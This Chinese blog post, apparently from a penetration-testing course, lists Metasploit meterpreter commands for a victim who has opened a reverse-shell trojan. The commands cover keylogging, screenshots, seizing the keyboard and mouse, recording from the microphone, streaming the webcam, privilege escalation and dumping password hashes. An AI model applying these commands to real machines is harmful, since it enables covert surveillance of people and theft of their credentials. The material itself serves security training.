meterpreter 一些命令,获取摄像头的操作

2019年08月29日 17:51:35 作者:必火 阅读数:8921
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学:报名加微信:18622800700,手机:18622800700。推荐学员入学奖励现金2000元

Metasploit之木马的用户操作及摄像头操作

本章节内容是上接”09-Metasploit之我的远程控制软件”的,

首先还是生产木马,选择TCP反向连接方式,监听相关IP和端口,受害者打开木马,连接成功回显↓

meterpreter > 

进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容

首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

用户操作:Stdapi: User interface Commands(用户接口命令)

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)

getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_dump    -->转储按键缓冲(下载键盘记录)

keyscan_start   -->开始捕获击键(开始键盘记录)

keyscan_stop    -->停止捕获击键(停止键盘记录)

screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)

setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)

使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错

摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat      -->开始视频聊天(视频,对方会有弹窗)

webcam_list      -->单摄像头(查看摄像头列表)

webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)

其他命令操作

getsystem        -->获取高权限

 

hashdump         -->获取当前用户hash